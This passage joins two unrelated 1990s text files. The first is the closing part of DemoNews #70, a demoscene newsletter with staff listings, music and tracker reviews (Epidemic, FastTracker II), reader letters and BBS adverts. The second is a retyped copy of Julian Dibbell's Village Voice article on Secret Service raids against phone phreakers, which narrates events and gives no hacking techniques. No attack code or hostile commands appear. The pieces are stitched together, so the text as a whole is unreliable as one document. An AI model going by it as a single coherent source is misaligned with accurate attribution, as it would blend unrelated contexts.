          : together DemoNews, move some of the files, and try to keep things
          : organized.

  Name    : Dan Wright (Pallbearer)
  Address : dmw@inca.gate.net
  Title   : EX-COORDINATOR
  Info    : In charge of putting the Escape DemoCD together and was the
          : previous coordinator of this site.

  Name    : Mike
  Address : weis@elf.stuba.sk
  Title   : ???
  Info    : I have never written you and I don't know what you do on this
          : site.  Please contact me.

  Name    : (Styros)
  Address : iq23@jove.acs.unt.edu
  Title   : LINKMAN
  Info    : Styros will be in charge of making links on Hornet (you know,
          : those symbolic things that are under /groups, etc).  Its not a
          : very fun job, but one which needs done.

<<DEMOS>>

  Name    : Brenton Schwartz (Zenith)
  Address : bswa1595@pilot.stu.cowan.edu.au
  Title   : DREVIEW
  Info    : From now on, Brenton will be helping to review the demos on this
          : site.  I think there is already someone in charge of this, so
          : I'll have to check.  Also, he will be helping to get all of the
          : .message files uniform on this site.

<<MUSIC>>

  Name    : Ryan Cramer
  Address : rcramer1@osf1.gmu.edu
  Title   : MARTICLE (Music Articles)
  Info    : Writes weekly articles for the "Musicians Corner" section of
          : DemoNews.  Ryan will also serve as our technical music advisor.
          : If you have any musical questions, they will be forwarded to him.

  Name    : Per-Ivar Knutsen
  Address : perk@stud.cs.uit.no
  Title   : MREVIEW (Music Reviewer)
  Info    : Ivar will be helping to review new music that is uploaded to
          : Hornet.  This will probably not start up for 2-3 weeks.

<<CODING>>

  Name    : Grant Denthor
  Address : denthor@beastie.cs.und.ac.za
  Title   : CARTICLE (Code Articles)
  Info    : Writes weekly articles for the "Coders Corner" section of
          : DemoNews.  Denthor will also serve as our technical code advisor.
          : If you have any programming questions, they will be forwarded to
          : him.

  Name    : Diego Roversi
  Address : piu1766@cdc8g5.cdc.polimi.it
  Title   : CREORG (Code Reorganizer)
  Info    : Diego will be helping to reorganize the /code directory.  After
          : this is done, Diego will help out with Project DemoBook.

  Name    : Andy Younger (King Tech)
  Address : aiy@mundil.cs.mu.OZ.AU
  Title   : CMOVER (Code Mover)
  Info    : From now on, Andrew will be in charge of moving code uploads
          : from the /incoming/code directory to their appropriate places
          : under the /demos/code directory.

  Name    : David Thornley (Metal)
  Address : dthorn@gco.apana.org.au
  Title   : CREVIEW (Code Reviewer)
  Info    : David will be helping to review source code that is uploaded to
          : Hornet.  This will probably not start up for 2-3 weeks.

<<ANSI/ART>>

  Name    : Jason (Cavalier)
  Address : cavalier@shadow.net
  Title   : AGENERAL
  Info    : I had never written Jason until this week.  From now on, he will
          : be giving me a list of updated ANSI each week to put in this
          : newsletter.

In the next couple of weeks, I will be contacting all of you individually
about your jobs.  However, please write to me with any ideas or thoughts you
have.  There are a LOT of people that I am coordinating with, but once things
settle down, it will actually be less work for me.

------------------------------------------------------------------------------
(HOW TO REQUEST DEMONEWS)
------------------------------------------------------------------------------
I have been getting many requests from people wanting to subscribe to
DemoNews.  If you write me, you will receive the following letter:

|
| How to Subscribe to Demo News
| -----------------------------
|
| If you want DemoNews delivered to your mailbox each Sunday,
| you need to do the following:
|
| 1. start a mail to listserver@oliver.sun.ac.za
|    (subject line can be anything)
|
| 2. in the message body, put "subscribe demuan-list your_name".
|    (Substitute "your_name" with who you are).
|
| 3. send it!
|
| That's all you have to do.
|
| Once that is done, you will start receiving Demo News each
| SUNDAY morning in the mail.
|

This system is designed to be streamlined and automated.  If you have a
problem, feel free to write me.  If you just want to subscribe to DemoNews,
follow the instructions.

==============================================================================
((Section 3...New Uploads))
==============================================================================
FILENAME.EXT  LOCATION               DESCRIPTION
------------------------------------------------------------------------------
-----------.
| --DEMOS-- |    (all locations start with /pub/msdos/demos...)
`-----------'
4k_less.zip   /alpha/NEW             Paranoids 4K ASM '94 intro.
busmatk4.zip  /compos/party94        The Party94 info and BUSTRIP. In Denmark
escintro.zip  /alpha/NEW             The ESCAPE Demo/MC2 CD intro. GUS.
venusluc.arj  /alpha/NEW             Subsystems Venus plus Lucas GUS
wrdrst.zip    /alpha/NEW             Wired Party's final results (top 3). GUS

.-----------.
| --MUSIC-- |    (all locations start with /pub/msdos/demos/music...)
`-----------'
epidemic.arj  /disks                 Epidemic Music Disk 1/3
epidemic.a01  /disks                 Epidemic Music Disk 2/3
epidemic.a02  /disks                 Epidemic Music Disk 3/3
popbpdi .zip  /disks                 Music Disk by Priests of Power
cmod205 .zip  /programs/players      CapaMod 2.05 -AWESOME MOD/S3M GUS PLAYER!
m3rip200.arj  /programs/rippers      M3RIP 2.0 Rips songs from many demos
ft2     .zip  /programs/trackers     Fast Tracker ][ (need I say more?)
sidpl123.zip  /songs/c64             Updated C64 Music Player (SB Only)
dzone   .zip  /songs/mod             Danger Zone by Kerry Ho
loose-tf.zip  /songs/mod             Loose Concensiousness by Trifixion
takesme .zip  /songs/mod             Takes me Away by Da Mellow Fellow
elec-o  .zip  /songs/mtm             The Electric Order by Fortunato
sr-newba.zip  /songs/mtm             New Bass by Warp
sr-pang .zip  /songs/mtm             Pangai by Warp
adv-beat.zip  /songs/s3m             Advanced Beats by The Peric & Beathoven
ambidemo.zip  /songs/s3m             DemoGrafix by Replay
cwnt    .zip  /songs/s3m             Crying With No Tears by Echo Mirage
dreamof2.zip  /songs/s3m             Dreams of Cocain by The Peric
exotic  .zip  /songs/s3m             Exotic by Cerulean
fbrain  .zip  /songs/s3m             Future Brain by Lord Soth
flips3m .zip  /songs/s3m             Flip by Kevin
free2   .arj  /songs/s3m             Free Laid Back Remix by Tragos
induct4 .zip  /songs/s3m             Induction by ??
nevrlost.zip  /songs/s3m             Never Lost by Domino and Evil Notion
nf_ecout.zip  /songs/s3m             Ecoutez by N-Factor
nihils3m.zip  /songs/s3m             Nihilism by Kevin
phreak  .arj  /songs/s3m             Phreaking Hardcore by Whizz Kid
sky_belg.zip  /songs/s3m             Belgio by Skyjump
sky_plut.zip  /songs/s3m             Plutonic Rock by Skyjump
sr-det  .zip  /songs/s3m             Det by Le Barman
srfstct .zip  /songs/s3m             Surfisticated by The Peric

DELETED
  -corrupt-        /music/time/aftermid.zip    abyss   .zip  ambient .zip
                   lostalon.zip
  -no description- epidem-1.zip  fiction .zip  mdss032c.zip  moondnce.zip
                   vortex2 .zip
  -old version-    cmod201 .zip  sidpl120.zip

Note: We had to delete some sample packs this week.  There is not enough
      room and they will be deleted from now on.

--------------.
| --ART/ANSI-- | (all locations start with /pub/msdos/demos/...)
`--------------'
Cavalier did not send in an article this week.

----------.
| --CODE-- |     (all locations start with /pub/msdos/demos/code...)
`----------'
Because of the size of this issue, I did not have time to do this directory.

==============================================================================
((Section 4...Musicians Corner))    <BY>    Ryan Cramer [Iguana/Renaissance]
==============================================================================
(GENERAL)
------------------------------------------------------------------------------
> [Christopher G. Mann] : From now on, Ryan will be doing this section.
>                         However, I may still have the occasional comment
>                         now and then.

Last week, two long awaited releases finally came out: The Epidemic
multigroup music disk, and FastTracker II from Triton. I'm sure that just
about everybody has already checked this stuff out, but here's a little
information about each.

I hope you enjoy these articles,
Ryan Cramer

rcramer1@osf1.gmu.edu
Renaissance/Iguana

All files/programs mentioned below can also be found on Data Connection BBS:
Node 1: (703) 506-8598 - 16.8k HST DS
Node 2: (703) 847-0861 - 28.8k V.FAST HST DS

------------------------------------------------------------------------------
         ____                    __
        /\  _`\_          __    /\ \                     __
        \ \ \L\_\  _____ /\_\   \_\ \     __    ___ ___ /\_\    ___
         \ \  _\L_/\ '__`\/\ \  /'_` \  /'__`\/' __` __`\/\ \  /'___\
          \ \ \L\ \ \ \L\ \ \ \/\ \L\ \/\  __//\ \/\ \/\ \ \ \/\ \__/
           \ \____/\ \ ,__/\ \_\ \___,_\ \____\ \_\ \_\ \_\ \_\ \____\
            \/___/  \ \ \/  \/_/\/__,_ /\/____/\/_/\/_/\/_/\/_/\/____/
                     \ \_\
                      \/_/                                Music Article 1 of 5
------------------------------------------------------------------------------

E P I D E M I C - Multigroup music disk produced by Renaissance/iCE
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

This music disk has been almost a year in the making, I remember many
months ago when people first started talking about it. It was originally
supposed to be released during the summer of '94, but many small problems
set it back. For those that have seen it, I think that just about everybody
agrees it was worth the wait.

The idea for Epidemic originally came from Syntax of iCE. He put a lot of
work into getting the whole thing organized. Originally, the music disk was
not as big as it turned out to be. About a year ago, Pixel/FC was visiting
the USA doing some work for Epic Megagames. At the time, he had the job of
doing all of the Epidemic graphics. I drove over to the Epic Megagames
offices (which are about 20 mins from my house) and checked out all of the
work that he was doing there, it was really amazing! In the final version,
Pixel's graphics were not used, but you can see what he was working on by
hitting F1 while your in Epidemic. At this time, Epidemic was in its very
early stages, and it turned out quite a bit different from the original
plan. The goal was to produce the best music disk in the scene.

Over the months, Epidemic sort of got set on the backburner. A lot of
people involved in its production did not have the time to complete it.
Early in October, I started asking if it was ever going to be released.
After some talk, we all agreed that we should have it out by November 1st
no matter what the case. Luckily, by November 1st, everything was ready to
go. Epidemic was released shortly thereafter.

In my opinion, Epidemic truly turned out to be the best music disk ever
made. All of the music was unique, high quality, and enjoyable to listen
to. Its the best collection of songs from some of the top musicians in the
scene that you will find. Epidemic is more then just great music, it also
had some excellent graphics by Ink/PM, Pixel/FC, Tran, Delsion/Cascada,
and Oman/Legend Design. I guess you could say it was a multigroup art disk
too. :) Daredevil/Renaissance also did a great job with the interface
coding, the mouse was really a neat idea. :) The music drivers written by
StarScream & Daredevil were really perfect for this music disk. Not only
did they sound awesome, but they supported a very wide range of soundcards.

In general, the music disk has a very mellow feel to it. Some people
complained about this, but I think that in a scene where techno seems to be
the norm (I do like techno btw) it was really a nice treat. My favorite
songs in the disk were: "Forever" by Basehead, "Split Second" by Nemesis &
Parity Error, "HyperControl v3.0" by Necros, and "Soon I Will End" by
Mellow-D. Of course, ALL of the music in the disk was outstanding though.

While most of the feedback from Epidemic has been very positive, there have
been a few things that people have complained about too. It seems that a
lot of members from the ANSI group "ACiD" think that Epidemic really sucks,
I can't understand why though?  In addition, Epidemic seems to have
problems running on some people's computers, although this is VERY rare.
The same thing can be said for just about every release that the demo scene
has ever put out. :) One bug that you might find in Epidemic: If you shell
to DOS while playing music, then change directories, and then EXIT back
into Epidemic, it will not be able to find its music files. :-| Epidemic
uses a CD Player style interface, but many people have mentioned that they
would have preferred a menu interface where they could select the song by
name and author. That is something for music disk coders to keep in mind
for the future, although I find the Epidemic interface very functional and
easy to use. Finally, the only thing I didn't really care for in Epidemic
was the cheezy ANSI logo that scrolled by in the beginning. While I'm sure
it was difficult to make such an ANSI, and the lettering was impressive, it
just did not fit in with the high resolution VGA graphics that were being
displayed around it.

The Verdict: Epidemic is definitly the best music disk in the scene today,
be sure to grab it if you don't have it already!

You can get the music disk from:

ftp.eng.ufl.edu - /pub/msdos/demos/incoming/music/
---------------
epidemic.arj - 1.43 megs
epidemic.a01 - 1.43 megs
epidemic.a02 - 1.39 megs

It might be relocated to /pub/msdos/demos/music/disks/ by the time you read
this.

NOTE: Due to a lack of space on Hornet, and because of the large size of
Epidemic, it may be deleted from the site pretty soon. You can also get it
from freedom which is mirroring hornet.

freedom.wit.com - /systems/ibmpc/demos/incoming/music/
---------------

Here's a list of the credits for Epidemic:

                              C  R  E  D  I  T  S

                   Forever .. Basehead [Mental Design / iCE]
                  Intro Tune .. C.C.Catch [Renaissance / iCE]
                The Passage of Time .. Ryan Cramer [Renaissance]
                   MoonGlow Groove .. Daredevil [Renaissance]
                            Don Huono .. Edge [EMF]
                     Torch and Stompy .. Leinad [Avalanche]
                 Escape and Triumph .. Leviathan [Renaissance]
           Essence II and Soon I Will End .. Mellow-D [Orange / iCE]
                     Intrepid .. Mosaic [Renaissance / iCE]
        HyperControl v3.0, IntroSpection .. Necros [Legend Design / iCE]
          From Beyond and Split Second ..  Nemesis [Renaissance / iCE]
                      Nova .. Purple Motion [Future Crew]
                        DataJack .. Skaven [Future Crew]

                   Interface Code .. DareDevil [Renaissance]
                     Intro Code .. StarScream [Renaissance]
             Sound System .. StarScream and DareDevil [Renaissance]
       Concept / Organization / Documentation .. Syntax Error [iCE / FC]
           VGA Graphics ..  Delsion [iCE], Ink [iCE / Psychic Monks],
           Pixel [Future Crew], Tran [Nothing], Oman [Legend Design]
                         Ansi Artwork .. Pnakotic [iCE]

------------------------------------------------------------------------------
       _____         _     _____               _               ___ ___
      |  ___|_ _ ___| |_  |_   _| __ __ _  ___| | _____ _ __  |_ _|_ _|
      | |_ / _` / __| __|   | || '__/ _` |/ __| |/ / _ \ '__|  | | | |
      |  _| (_| \__ \ |_    | || | | (_| | (__|   <  __/ |     | | | |
      |_|  \__,_|___/\__|   |_||_|  \__,_|\___|_|\_\___|_|    |___|___|

                                                          Music Article 2 of 5
------------------------------------------------------------------------------

FastTracker II by Triton
========================

FINALLY! The tracker all of us musicians have been waiting for has been
released. I had just about given up on this program, I thought that it
would never be released! However, I think that this tracker may have been
released just a bit too late, read on to find out why. I haven't had a lot
of time to screw around with this tracker yet, but I'll just leave some
initial impressions.

When I first got started in the music scene, a tracker called "FastTracker"
was just released, it was the first non-shitty tracker in the scene, and it
became very popular because it was reliable, it had a nice interface, and
it supported up to eight channels with the MOD format. This tracker in fact
INVENTED the 6 and 8 channel MOD formats. Before FastTracker came out, I
was using a piece of shit called "Whacker Tracker". I had always wondered
about the name "Whacker Tracker" and after using the tracker I started to
guess what the authors of the program were doing while they were coding it.
FastTracker was really an improvement, and it sounded GOOD on my SBPro.
(This was before I bought a GUS).

Now in November of 1994, Triton has finally released the sequel to
FastTracker II, and it looks to be the best tracker ever. FastTracker II
has so many features that there is no way I'm going to be able to cover
even a fraction of them here. Its something that you'll have to check
out for yourself.

FastTracker II is supposed to be sort of a Protracker for the PC.
Protracker is the standard Amiga MOD tracker, and those that have Amigas
swear by it. Perhaps they'll find they like FT2 even better? FT2 is
really very smooth, everything is well planned out and the interface is
beautiful to look at. Triton's coders have also made the tracker "cute"
(as some chick said) in many ways. For instance, the mouse cursor will
show a spinning hourglass while it is loading something, or, when you
want to quit, FT2 has a bunch of different messages it will display, one
being "You lazy bastard!". :) FT2 is also the most configurable tracker
that I have ever seen, its amazing what Triton has done.

FT2 offers a lot of new things not previously seen in other trackers.

Volume & Panning Envelopes: This is really a neat idea, and you can make
some trippy sounding samples with this stuff. However, I still am not
totally sure how useful this will be when making tracked music. I guess
only time will tell. I don't think that I will be using this feature
much, atleast not initially.

Internal sampler/sample editor: WOW! This is something that every
tracker should have STANDARD! Not much more to say except that this is
one of my favorite features of the program. One thing that could have

@Via Squish/386 1.11 2:200/427, Sun Nov 13 1994 at 06:47 UTC

been improved is the sample looping feature. Its kind of a bitch to hit
the WAVE key everytime you want to hear the sample. When trying to get a
perfect loop on sample, you might end up hitting that blasted key 500
or more times! FT2 could learn something from ST3 in this respect.

Nibbles: FT2 includes a little game called Nibbles. Its really a great
idea to have that. That way, when you get frustrated with your music,
you can have a little diversion. However, I find that the game Nibbles
is even more frustrating than making music. For my tastes, I would have
preferred a little pictures slideshow feature showing Sports Illustrated
Swimsuit models, and some of those chicks in that Victoria's Secret
Catalog. That would be much more calming than Nibbles. Perhaps an idea
for FT3 Triton?

While FT2 is truly very awesome, I've got a few gripes with it. The main
one being that the included documentation is not adequate at all. FT2 is
an immensely complicated program, yet I think that the only people that
really know how to use it is the people that coded it. I hope that in
the future, someone writes a better documentation for FT2, and one that
is actually in a text file, not inside the program (so we can print it
out).

Another problem that I have with FT2 is that the notes cut off as soon
as you let go of the key on your keyboard. This is very non-standard for
trackers, and it is going to take me a LONG time to get used to. In
order to keep it from cutting off, you've got to screw around with the
volume enveloping, but what if you want to make a MOD compatible song?
In addition, in the sample select window, there are buttons for
selecting samples 01..08, 09..10, 11..18, etc. I find this kind of
annoying, it would have been much more useful to make a scrollbar. There
are many other things that I could gripe about in FT2, but I must say
that theres a lot more to like about FT2 than there is to dislike.

Some people have also mentioned problems using FT2 with the Soundbastard
series of soundcards. My guess is that its a hint that you should
probably buy a GUS, but if you need it to work with your shitblaster,
try going into the sample editor and hitting the WAVE button, apparently
this initializes SoundCrappers somehow.

I think that FT2 was released just a little bit too late. It seems that
at this time, Scream Tracker ]I[ by Future Crew is really the standard.
Just about everybody is using ST3. I think that a lot of ST3 users are
not going to change over to FastTracker II because it has an extremely
different interface, and is using a different command set. This makes
the transition kind of difficult. Some ST3 users that I have talked to
have said that their attempts at using FT2 have made them frustrated.
ST3 is also more intuitive in some areas. My guess is that ST3 and FT2
will both be the standard trackers, I don't see one taking over the
other because each offers its own advantages.

I'd really like to congratulate Triton on what looks to be the most
impressive tracker ever made on the PC. They've obviously put a lot of
hard work into this one, and we really owe them a thanks. I was very
impressed that the tracker is not cripped in any way. This really gives
us the chance to see how well we can compose in it before registering. I
urge all of you that use FT2 to register it, Triton really deserves to
make a great profit on it. $20 is such a small amount to ask for such a
great tracker. Remember that old buggy tracker called SBStudio? That guy
wanted like $70 for that thing, what a rip off! $20 is a great deal just
for the sample editor in FT2!

You will definitly want to grab FT2, you can get it at:

ftp.eng.ufl.edu - /pub/msdos/demos/incoming/music/
===============
ft2.zip - 332570 bytes

By the time your reading this, the file may have been moved to:

/pub/msdos/demos/music/programs/trackers

------------------------------------------------------------------------------
           _____         ___.   .__                         _________
          /  _  \   _____\_ |__ |__| ____   ____   ____  ___\_____   \
         /  /_\  \ /     \| __ \|  |/ __ \ /    \_/ ___\/ __ \ /   __/
        /    |    \  Y Y  \ \_\ \  \  ___/|   |  \  \__\  ___/|   |
        \____|__  /__|_|  /___  /__|\___  >___|  /\___  >___  >___|
                \/      \/    \/        \/     \/     \/    \/<___>

                                                          Music Article 3 of 5
------------------------------------------------------------------------------
Word has it that Tran might be releasing a new demo utilizing true color!
It may be something like Timeless, but better! Stay Tuned...

------------------------------------------------------------------------------
(MOD4WIN Thoughts by DWSPAST@VAX1.ACS.JMU.EDU)            Music Article 4 of 5
------------------------------------------------------------------------------

Hey Snowman...

I noticed a file on ftp.eng.ufl responding to an article in Demo News (about
Dynamic Studio, I believe).  I had a quick comment on a couple of Demo News
reviews, though not really directly related to either program.

I purchased Mod4Win over the summer for what I consider to be an extremely
inflated price ($30 for simply a MOD player).  Mod4Win is far and away the best
Windows MOD player, and even in contention for one of the best outright.

However....JSInc. charges $30 for registration and $15 for simple updates (as
in, a 2.00 to 2.10 update).  Their program, in its "shareware" form, is not
only crippled; it is time-limited, and becomes totally unusable after 30 days.
In addition, it stores information somewhere on the user's hard drive that make
it impossible to re-install.

I've had nothing but praise for JSInc.'s product, and have supplied bug reports
when I've noticed small quirks.  However, JSInc.'s tech support (at least in
e-mail) has been rude, arrogant, and unacceptable at times.  I just thought I'd
throw in my two cents; Mod4Win seemed to get away a little too unscathed in its
review.  However, I have to confess that I haven't seen Dynamic Studio...

Keep up the good work, all around.

------------------------------------------------------------------------------
(Dynamic Tracker Response)                                Music Article 5 of 5
------------------------------------------------------------------------------

Hi there Snowman and VLad DRacl
-------------------------------

I fortunately happened to see the mail at your site today, 11-06-94. The re-
view you made of our program Dynamic Studio v1.00 was quite a relief. From
what I understand you liked the program pretty much. We have been working
really hard on DS for about a year and a half, but since you never get
satisfied with a program you have to quit sometime and release it to the
public.

I noticed that you talked about the serious crippling of the program. Yes,
all save functions have been removed from the demoversion, but this is not
a Dynamic-Studio-ONLY cripple, many programs does this to prevent piracy,
getting at least someone to register the program and so on... =)

Since the price is what really seem to be the problem, I have to say some-
thing about that aswell. Four people have been working with DS. This means
four people share the income of the program. So far so good... The price of
DS had to be set to $55 due to the following facts. A simple money order from
you to us costs _us_ $9!! And after that we have to subtract the taxes, ship-
ping and handling, disks, labels and so on... Whats left for us to split is
not really worth mention, I hope you see the problem we're having here... =(

You also mentioned registering DS by cash. Many people appriciate this type
of payment. Think of it as an option, you don't _have_to_ pay with cash, it's
just another option for those who prefer it. We infact talked to the banks
around here and they didn't have any negative comments about it..

It's a bit unfortunate but none of the guys in Loom Syndicate have an inter-
net address yet. =( However, a buddy of ours has got one we can use for now.
Note: This is only a temporary address! Use the following eMail address:

        pt91cfs@pt.hk-r.se

And now for the good part (so to speak). From the 1st of November (this year)
until the 1st of March (next year), we're having a SPECIAL PRIZE on Dynamic
Studio for about $35!!! We are decent guys, you know.. =) Anyways, there
shouldn't be any money-problems now. Our income during this period will be
nada/zip/zilch/nothing! But we feel it's better people can use the program
than it is to not use it cause of some problem! Watch out for an intro coming
out these days, containing the SPECIAL PRIZES, and the new registration
forms.

Anyway, thanks again for reviewing Dynamic Studio! We really appreciate it..

Many thanks from The Loom Syndicate!



                                        Signed Bonanza / Bjrn Nordstrm

                                        BTW: Are you my mother...

==============================================================================
((Section 5...Coders Corner))    <BY>    Denthor [Asphyxia]
==============================================================================
> [Christopher G. Mann] : From now on, Ryan will be doing this section.
>                         However, I may still have the occasional comment
>                         now and then.  Denthor's articles will start
>                         appearing in next week's DemoNews.  This week, its
>                         still Snowman.

------------------------------------------------------------------------------
(Assembly 94 4k-intros) by Bryce Penberthy
------------------------------------------------------------------------------
Here's what I found about the 4k intros....

All of the intros that were in the 4k intro directory were also included
in the file ass_pc4k.zip.  However there were some intros that were
included in the pack that were not in the demos directory.  These included:

SPAM            CMODORE         TINY            SPREADME
BARTI           LEGALIZE        HMMMM!          VIRT
THE_FART        MAGICBAL        RIPOFF          STONED
KRIKKIT         ANTRO           TR6             REDROCK
KILTRO          RAVEDEMO        THEWAY          PDL_CMPO
S-FRACT         COME!           TORNADO         FLIGHT
MOVEIT          ZOM486          ZOM386          G_APPLE
SMALLONE        PLASMAT         THE_CUBE        YELLOW
TOMTE           WACO            JOX             NUAGE!

If you use pkzip with the -d option then it will create separate
directorys for the top intros in the competition.  Most of the intros
used fractals, but there were some different routines spread throughout
the intros.  One worth mentioning was Fractal Dreams, which showed some
unique 3-d fractals.

------------------------------------------------------------------------------
(PKLITE vs. LZEXE)
------------------------------------------------------------------------------
I posted the following article last week.

| I would like to open a discussion on what the best .exe compressor is out
| there.  Personally, I know very little about this area and I have only used
| PKLITE and LZEXE a few times.  However, I'll bet that there are a few
| coders out there who have some thoughts on the matter.
|
| What do you think?

I received absolutely NO response on this topic, so I will say that PKLITE
is the best .EXE compressor ever made!  "pklite" is a lot easier to say than
"lzexe".  Since no one responded to last week's article, this is how I came
to my decision.

=============================================================================
((Section 6...ESCAPE Demo/Music CD))
==============================================================================
[From Christopher G. Mann]

I would like to apologize for forgetting something in the Escape intro.  No
mention was made as to the specific songs that will be contained on the
Escape CD.  Below is a list a generated for someone (I don't remember who):

Track  File Name     Song Name                  Author          Time  Player
          
  1    DATA          [CD-ROM Digital Portion]
  2    FARE2   .MTM  Farewell (MC2 theme)       Snowman         2.49    CMOD
  3    V-VOYAGE.S3M  Distant Voyage             Markell Moss    5.21     DMP
  4    V-GUARD .S3M  Guardian of Souls          Krystall        3.36     DMP
  5    V-ESTRNG.MOD  Estranged                  Khyron          2.25    CMOD
  6    V-OVERLD.MOD  Maximum Overload           Jenkins         4.20    CMOD
  7    V-LOST  .MTM  Lost In My Fantasy         Clement Poon    3.16     MTM
  8    V-FUSION.S3M  Fusion Harmony             Donovan Seidle  3.25     DMP
  9    V-VIBES .S3M  Wish this song had a name  Protocol        5.45     ST3
 10    R-ADRNLN.S3M  Adrenalin                  tR/\Sh          4.42     MDP
 11    R-DELIVR.S3M  Deliverance                JeDi            4.39     DMP
 12    TAKEME  .S3M  Take Me to the Night       Krystall        3.12     DMP
 13    STORY   .MTM  Story of Faith             C.C.Catch       3.40     MTM
          
       12 songs                                                47:10
                                                               47:32 (pause)

2 second pause between each song additional 22 seconds.

Escape is a combination audio/data CD.  It contains data you can
play with a standard CD player and data that computers can
understand.  Track 1 is reserved for the computer portion, and the
rest are all playable in any standard audio CD player.

With the exception of Farewell, Take Me to the Night, and Story of
Faith, all songs on this CD were entries in Music Contest ][.  MC2
was an international computer-based music competition that was
hosted by myself, Christopher G. Mann.  The top songs are now part
of Escape.

[From Dan Wright]

The ESCAPE CD intro was released last week (escintro.zip) which I hope

@Via Squish/386 1.11 2:200/427, Sun Nov 13 1994 at 06:47 UTC

many of you download even though most of you who read this section know
what is in the intro.  One thing the intro left out was the FACT that
there are 12 D/A songs--9 from MC2--on the CD.  Minor details...

The FINAL details regarding the CD's COSTS and RELEASE will be going out
this week so be on the lookout (E-mail) if you have reserved a COPY.


==============================================================================
((Section 7...Advertisements))
==============================================================================
[1]

      = R  E  C  K  L  E  S  S     L  i  F  E     B  B  S =

Portugal's Coolest! Demo-Oriented: Demos,Intros,Demo Coding,Magazines,Art
-=[++351-(0)1-LiSBON!,24h,V32b,DX2/66LB,1 GiG,CD,Tapes,SysNav: Asskicker]=-
          Electromotive Force (EMF) Dist Site & Portugal HQ
                   Nostalgia Dist Site & Portugal HQ
                     Union Dist Site & Portugal HQ
                      VLA Dist Site & Portugal HQ
                           Asphyxia Dist Site
                                NUKE WHQ

                           Call ++351-01-716 67 58
                          System password: RIVENDELL

                            No Ratio for LD callers

[2]

All Demo-Freaks in Holland who want to go to the Party '94 in Denmark and
don't know how ?!? We at Trance have organized a bus-trip which will leave
from Arnhem and will cost 100 guilders per person.If anyone outthere is
interested, mail me for more information and the (Dutch) invitation letter.
Leave mail to: p.vanmun0@hsbos.nl
Hope to hear from you soon !


==============================================================================
((Section 8...Miscellaneous))
==============================================================================
This newsletter is getting REALLY big now.  As a result, some changes are
being made. I will no longer be writing all of the coding and music articles.
Also, the "Contents" will now contain the titles of the articles under each
section.  I will also be giving up some of the responsibility of file-moving.

Here are some changes that are being made to HORNET:

    -review of music players, trackers, and utilities
    -the /code directory will be reviewed and detailed explanations will be
        given to the source code within
    -improved links > Diego will be helping to get these correct
    -DEMOBOOK, a collection of addresses and info from people in the scene
    -code expert > Denthor will be helping to contribute articles and answer
        questions about source code in the "scene".

==============================================================================
((Section 9...Closing))
==============================================================================
This newsletter seems to be getting larger each week.  Some of my best
friends in the "scene" are now on the staff, and they help to make DemoNews
a robust production.

When I was the only one writing the music and code articles, I felt that my
views might not acurately reflect those of the demo scene.  Not only that,
but I didn't feel I was really qualified to write in either section.

Next week we'll take an in-depth look at NAID, the North American Inter-
National Demo Festival.

The quote for this week comes from Axcess magazine (Vol II, #4, p98):

   "Programming complex demos in assembly is difficult and tedious,
    but it's also what separates the men from the boys." -- B. Walkington


                        -Christopher G. Mann (Snowman)-
                            r3cgm@dax.cc.uakron.edu

---------------------------------------------------------End-of-Demo-News-#70-

**********************************************************************
 Yep, another article form the elite journalist of hackerdom Julian Dibble, this one's on just general bullshit. I copied it from the Village Voice 7/24/90. MoD is on the cover looking good. This is fucking long article and represents about five hours of typing and a 12 case of Diet Coke over the midnight hours. Enjoy it dammit.
                                                            --TiN OmeN
**********************************************************************


"On Line and Out of Bounds..." By Julian Dibbell



Here's how Joey tells the story: 

It was around 3:30 on a Wednesday afternoon in January when the knock on the door came. The house was a three-family place in Queens, not far from the Brooklyn borough line. Joey's 12-year-old sister, the only person home at the time, answered the door. She'd never seen a search warrent before. She didn't understand why eight casually dresses and fully armed strangers barged into her house, headed straight for her brother's room, and began putting his things- starting with his computer, a stripped-down Commy 128- in boxes. She decided that they were theives, and that the only thing to do was cry.
When Joey's mother arrived home a short while later from her job as a midtown receptionist, her daughter met her at the back dfoor and told her that a bunch of men from the"Social Services Department" were inside stealing things. "The social what?" asked Joey's mom.          
    "U.S. Secret Service," said the men in Joey's room. US Secret Service. and a couple of security guys from the telco. They told her that they wanted to talk to her 20 year old son. They had reason the belive that Joey was a phone-systems hacker- a phone phreak- known in the computer underground as Acid Phreak. They had reason to believe he was a leader of the notorious hacker organization known as the LoD. They also suspected he was responsible for the multi-million dollar AT&T system crash on 1/15, which disrupted long-distance service for 9 hours. Joey's mom was not thrilled. 
    Joey got home from the movies about half an hour later. An agent carrying a box of his personal effects met him in the driveway, told him he'd better go inside and calm his mother down. He did. Then the rest of the agents greeted him with a wlcome home chorus of "JOEY!!!" By now they had almost finished packing up anything that looked interesting: his computer, three notebooks, about 200 floppy disk, his answering machine, his boombox, all of his cassette tapes. 
    Joey wasn't under arrest, but when they asked him to take a ride to the headquarters at the World Trade Center, he agreed. Once there, he says, they asked him what phone-system computers he had gained access to. He told them, in effect, that there weren't many he Hadn't penetrated, and he did his best to explain to the phone company reps the flaws in their security. They asked him about other hackers, asked him to name names. He didn't. They asked him what the purpose of his answering machine was. He told them it answered the phone. They asked him if he had mob connections, and they asked him if he was a Communist. They told him it was in his best intrest to cooperate. 
    Around one in the morning they let him go, no charges filed. By then he had sighned an statement swearing he hadn't caused the AT&T disaster (the phone comapny maintained that it was a result of a bug in their own software), and to this day he swears that in 10 years of hacking mainframe compuetrs and messing with the phone lines he never, to his knowledge, damaged a system. He'll also tell you that although his notebooks contained some juicy tech lore and the phone numbers of quite a few hackers, the floppies contained only about five disk of hacking info, with the remaining 195 or so taken up by games, and that the incriminating evidence on his audio tapes fell into roughly four categories: salsa, merengue, house, and lambada. 
    He'll also tell you, as will just about any local hacker or phone phreak you ask, that he was not the only Queens based telecom enthusiast radied on 1/24/90. The secret service also visited the homes of Joey/Acid Phreak's friend Mark (better known on BBS's as Phiber Optik, and as it turned out the onlt actual memebr of LoD raided that day) and a third "co-conspirator" known as Scorpion. Again no charges, and no big deal. Hacker busts go on all the time; there didn't seem to be any reason for these three searches to make waves outside the ad hoc network boards, electronically transmitted 'zines, and telephone conversations that constitutes the computer underground.     But there was something ominous about those raids. Only two days before, a guilty verdict had come down in the most publicized trial in the history of computer crime: accused of infecting the vast InterNet research network with a worm program that went haywire and temporarily shut down as many as 6000 systems, 24 year old Cornell grad student Robert Morris Jr became the first person ever convicted under the COmputer Fruad and Abuse Act of 1986 and now faced up to five years in prison and a $250,000 fine.
